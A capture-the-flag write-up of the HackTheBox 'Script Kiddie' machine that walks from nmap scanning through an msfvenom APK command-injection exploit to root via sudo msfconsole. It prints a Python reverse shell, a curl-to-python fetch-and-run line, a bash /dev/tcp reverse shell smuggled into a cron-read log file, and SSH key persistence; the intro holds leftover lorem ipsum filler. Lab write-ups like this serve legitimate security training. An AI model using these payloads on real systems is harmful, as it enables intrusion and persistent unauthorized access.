HackTheBox - Script Kiddie

21 March 2021 - 6 mins read time
Tags: Hacking

We’ll be covering an easy machine from HackTheBox containing interesting attack vectors in place. Lorem, ipsum dolor sit amet consectetur adipisicing elit. Eligendi modi excepturi sint rem id laudantium unde illo, quibusdam corrupti veniam sit. Perspiciatis voluptatem quam sequi tempore atque est assumenda nesciunt.

Contents


image

Nmap scan results

Starting off with a simple nmap scan.

___(root__LAPTOP-UFMALO92)-[/home/akshay/Desktop/HackTheBox/Machines/ScriptKiddie]
__# nmap -sC -sV -T4 kiddie.htb 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 17:52 IST
Nmap scan report for kiddie.htb (10.10.10.226)
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.18 seconds

We will keep the all-port scan running in the background.

nmap -A -T4 -p- --max-retries 2 -oN nmap-all-port-scan 10.10.10.226

Analyzing open ports

Now that we have a Python web server running on port 5000, we can browse the website for more information. My first guess would be to look out for /console endpoint which contains a powerful debugger that permits one to execute code from within the browser.

But that endpoint is missing, so let’s start with manual enumeration.

image

Looks like we can create meterpreter payloads and stuff. There’s also an IP Scanner, which is just using Nmap in the back-end. We can try for command injection in here.

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell.

One can try various command injection payloads from here.

I tried various payloads to get OS Injection but none of them seemed to work.

msfvenom APK template command injection

I found this article that explains a command injection vulnerability in Metasploit Framework's msfvenom payload generator.

https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/

This can be exploited by crafting a malicious APK file.

Proof Of Concept - https://www.exploit-db.com/exploits/49491

We have the option to upload a template file on the website which can further result in Remote Code Execution.

image

Payload to test: ping -c 3 10.10.14.115

First I will ping myself to check if this is working or not. So let’s create a payload with the above script.

image

image

Getting a reverse shell

# Python reverse shell
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.115",4444));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

We will use this python script to get a reverse shell with the help of curl.

Payload : curl http://10.10.14.115:8000/shell.py | python3

image

And we get a shell.

Privilege Escalation

Generating SSH keys for persistence

__# ssh-keygen -f kid
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in kid
Your public key has been saved in kid.pub

Now I will add my public key into /home/kid/.ssh/authorized_keys so that I can have SSH Access to the machine using my private key.

kid@scriptkiddie:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC5c+JNvJN/2omxgUkgClSyx4TdQ6gcy9SK41L4UT/3fl6j+yDa9ZYRmylnpX3A4Xms+5bkdBCQmeFPTuWlf6J9rZ22y4i3XPbFGnnEDEPmcoRCGuqI9KKJgktW6ysuqiq8+RxDAeWAd9aHFZqVUNqif+5ZbW8aSDFu1hBSQe9wdt7sv/B43eAFvA5m2wr0y+7+ejAk5...' >> /home/kid/.ssh/authorized_keys
kid@scriptkiddie:~/.ssh$ chmod 600 authorized_keys

image

Using pspy to get the list of running processes

I will open up two windows, one with pspy running and the other with a shell, so that we can monitor the commands as well as the processes.

So there’s a logs directory which contains a file named hackers. As soon as we write something to it, it gets deleted. Looks like there’s some kind of cron job running in the background (executing something from that file).

image

There is a file scanlosers.sh at /home/pwn which looks like is getting executed.

#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

So the script will cat the hackers file and then take the third word from it, inputting it as an IP to the script. So if I will inject something malicious into it, then it will get executed. Let’s try adding id and verify it using pspy.

random random $(id)

Add the above line in the hackers file and make sure that pspy is running somewhere so that you can monitor.

image

Shell as pwn user

Now that we have code execution as a pwn user, we can get a reverse shell.

random random $(bash -c "bash -i >& /dev/tcp/10.10.14.115/9001 0>&1")

image

pwn@scriptkiddie:~$ sudo -l                 
Matching Defaults entries for pwn on scriptkiddie:                              
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
                                               
User pwn may run the following commands on scriptkiddie:           
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\
       =[ metasploit v6.0.9-dev                           ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
Metasploit tip: Use help <command> to learn more about any command
msf6 > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
msf6 > bash
[*] exec: bash
root@scriptkiddie:/home/pwn# id
uid=0(root) gid=0(root) groups=0(root)